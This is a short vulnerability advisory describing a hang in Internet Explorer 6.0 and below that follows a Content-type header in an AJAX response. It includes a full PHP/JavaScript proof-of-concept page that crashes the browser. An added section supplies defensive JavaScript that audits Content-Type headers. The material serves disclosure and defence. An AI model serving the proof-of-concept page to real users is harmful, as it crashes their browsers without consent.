
Internet Explorer AJAX Bug



Summary:
Internet Explorer 6.0 and below hangs when it loads a specially prepared page.

Details:
When AJAX (Asynchronous JavaScript and XML) is used to load page content 
dynamically, the server side is free to send any response. The Internet 
Explorer process hangs when a Content-type header is sent within that response.

Vulnerable Versions:
Internet Explorer 6.0 and below, tested on Windows XP, 2000 and 2003.

Patches/Workarounds:
Unknown.

Exploits:
Execute the following PHP script in IE to cause its process to die.

<?php

    if (@$_SERVER['QUERY_STRING'] == 'ajax') {
        /**
            Sending this header causes Internet Explorer to hang.
        */
        header('Content-type: text/html; encoding=utf-8');
        echo "\n";
        exit;
    }

?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" 
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl">
<head>
  <title></title>
  <script type="text/javascript">
  
    function pageLoad() {
    
        xmlHttp = false;
        try {
            xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
        } catch (e) {
            try {
                xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
            } catch (e) {
                xmlHttp = false;
            }
        }
        if (!xmlHttp && typeof XMLHttpRequest != 'undefined')
          xmlHttp = new XMLHttpRequest();
        if (!xmlHttp)
          return;
        xmlHttp.open("GET", "?ajax", true);
        xmlHttp.send(null);        
    }
  
  </script>
</head>
<body onload="pageLoad()">
</body>
</html>


Discovered by
Łukasz Lach
anakin[at]php5[dot]pl
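
For site owners who want to find responses that emit a header like the one in the script above, here is an added example (not part of the original advisory) that parses a Content-Type value and flags text/html headers carrying any parameter other than `charset`. The advisory does not say which part of the header triggers the hang; the check rests on the assumption that the non-standard `encoding=` parameter is worth flagging, since `charset` is the parameter defined for text/html. The function names `parseContentType` and `auditContentType` are hypothetical.

```javascript
// Added example, not code from the advisory. Function names are hypothetical.
// Flags text/html Content-Type values with parameters other than `charset`.
function parseContentType(value) {
  const parts = [];
  let cur = '', inQuotes = false;
  for (let i = 0; i < value.length; i++) {      // split on ';' outside quotes
    const ch = value[i];
    if (inQuotes && ch === '\\' && i + 1 < value.length) { cur += ch + value[++i]; continue; }
    if (ch === '"') inQuotes = !inQuotes;
    if (ch === ';' && !inQuotes) { parts.push(cur); cur = ''; continue; }
    cur += ch;
  }
  parts.push(cur);
  const mediaType = parts.shift().trim().toLowerCase();
  const params = Object.create(null);           // no inherited keys
  for (const p of parts) {
    const eq = p.indexOf('=');
    const name = (eq === -1 ? p : p.slice(0, eq)).trim().toLowerCase();
    if (!name) continue;                        // tolerate a trailing ';'
    let val = eq === -1 ? null : p.slice(eq + 1).trim();
    if (val && val.length >= 2 && val.startsWith('"') && val.endsWith('"')) {
      val = val.slice(1, -1).replace(/\\(.)/g, '$1');  // strip quotes and escapes
    }
    params[name] = val;
  }
  return { mediaType, params };
}

function auditContentType(value) {
  const { mediaType, params } = parseContentType(value);
  const findings = [];
  if (!/^[a-z0-9!#$&^_.+-]+\/[a-z0-9!#$&^_.+-]+$/.test(mediaType)) {
    findings.push('malformed media type: ' + mediaType);
  }
  if (mediaType === 'text/html') {
    for (const name of Object.keys(params)) {
      if (name !== 'charset') findings.push('unexpected parameter: ' + name);
    }
    if (!('charset' in params)) findings.push('no charset parameter');
  }
  return findings;
}

// Constructed sample values; the first is the header sent by the script above.
for (const h of ['text/html; encoding=utf-8', 'text/html; charset=utf-8']) {
  console.log(h, '->', auditContentType(h));
}
```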